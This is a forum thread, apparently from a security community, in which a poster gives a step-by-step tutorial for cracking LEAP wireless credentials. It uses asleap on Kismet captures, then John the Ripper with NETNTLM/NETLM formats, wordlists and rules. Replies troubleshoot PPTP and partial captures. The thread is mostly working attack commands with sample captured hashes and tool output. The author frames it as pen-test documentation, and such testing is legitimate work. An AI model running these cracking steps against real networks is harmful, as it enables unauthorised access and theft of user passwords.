Tutorial : Cracking LEAP networks with ASLEAP and John

[williamc]

I recently performed a pen-test at a client site running LEAP. I thought I would document the process, not only to show others how, but for future reference.

To start, we are assuming you've run kismet on the site and determined they are using LEAP. Kismet will create a .dump file in the local directory from which you are running the tool. Within this dump file are the LEAP challenge and responses. Depending on the amount of traffic, you will get either of these responses from ASLEAP:

Code:

 asleap -r Kismet-Apr-29-2008-1.dump
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Closing pcap ...

This one didnt have any challenge/responses. Now this one:

Code:

 asleap -r Kismet-Apr-29-2008-1.dump
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.

Captured LEAP exchange information:
     username:     <removed>
     challenge:     d9b6a14378985feb
     response:      5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603
     hash bytes:   6fd3

Now we have a usable dump file, we can run a dictionary against the LEAP exchange. Prior to version 1.4 of asleap, you would have to use genkeys to generate a lookup file. Version 1.4 allows you to provide a ASCII dictionary directly with the -W option.
Here's what we do:

Code:

 asleap -r Kismet-Apr-29-2008-1.dump -W some_dictionary.txt

Depending on the size of your dictionary, and the password policy of the client, you may get the NT hash for the user. With this you can easily crack it with plain-text.info rainbow tables.

Worst case scenario, you get this response from asleap:

Code:

 Could not find a matching NT hash. Try expanding your password list. I've given up. Sorry it didn't work out.
Closing pcap ...

This is where John the Ripper comes in. John can take the challenge/response from asleap and attempt to run a hybrid attack against it, brute forcing based upon your dictionary! Here's how:

First, you must provide John a properly formatted challenge/response string. I used nano to do this. Open a blank document and copy the username, response, and challenge to the empty document using this format:
username:::response::challenge

Mine looked like this:

Code:

 <removed>::::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603:d9b6a14378985feb

Save the file and run john, requesting the NETLM format, and give it your text file:

Code:

 john --format=NETNTLM textfile.txt --wordlist=yourdictionary.txt --rules
Loaded 1 password hash (LM C/R DES [netlm]

John will make three passes against your input. It will run your dictionary, then your dictionary with appended characters, and finally a brute force. Press the space bar as john is running to see progress. The (1) (2) (3) will tell you which stage John is in. Stage three will take a long time! Your best bet is to have a comprehensive dictionary that can crack the password in stage 1 or 2. Also, knowing the clients password policy would be very helpful in determining the level of success you may have.

Edit 7-15-08:
To attempt LM hashes, change your input file to have three colons followed by two colons.

Code:

 <removed>:::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603::d9b6a14378985feb

Your john command would be:

Code:

 john --format=NETLM textfile.txt --wordlist=yourdictionary.txt --rules

John stores the cracked hashes in the john.pot file for future reference. So, if you try to crack an account that was already successful, you wont get any results. That is due to the results being stored in the john.pot file.

Hope this helps some of you out!

William

[the_Fox200634]

please can it be video Tutorial ?? & thanxxx

[theprez98]

please can it be video Tutorial ?? & thanxxx

Are you not capable of reading?

[Archangel-Amael]

Are you not capable of reading?

Typing is sometimes a problem too.

[williamc]

Updated with new information.

[imported_ulrick13]

ANy chances of having more information about using a rainbow tables (which one) with this attack ?

Thanks a lot in advance

[wdcapl]

So I've got sth like that:

Code:

Captured PPTP exchange information:
        username:          username
        auth challenge:    d637b0ed524788f0cecf87e16ada26fe
        peer challenge:    18a84cbcab35d1778ee7fdca7ca4bdfd
        peer response:     90739dc4365b4d45cf8b7a1a8223e28a96ae23165da5cc7b
        challenge:         5ef0615b8b680e7e
        hash bytes:        b6dc
        Could not find a matching NT hash.  Try expanding your password list.
        I've given up.  Sorry it didn't work out.

As you can see it's mschapv2. How can i crack it using john?
Is it possible to do that using the method below?
Thanks!

[williamc]

You've captured a PPTP response, not a LEAP. Both are implemenations of MSChapV2, but PPTP adds an additional layer. Therefore, you cannot use John to crack at this time and lose out on the brute force, hybrid attack. You can use the asleap method I outlined above, but it appears you already tried and were unsuccessful. Try to capture more challenge/responses and try again.

William

[LaVey666uk]

good tut, what would cause the following output (not a full capture?):

asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Captured LEAP exchange information:
username: < .. >
challenge: a4c275524df69c2b
response: 11a6119c4e11aba55d8518e1c8c2980895ea489a7ba39d0b
Could not recover last 2 bytes of hash from the
challenge/response. Sorry it didn't work out.


Cheers

[williamc]

This is probably due to Kismet running in default channel hop mode. You only grabbed part of the exchange before Kismet jumped channels. Try scanning only the one channel, and preferably only the SSID. You should get the entire challenge/response and be able to continue.

William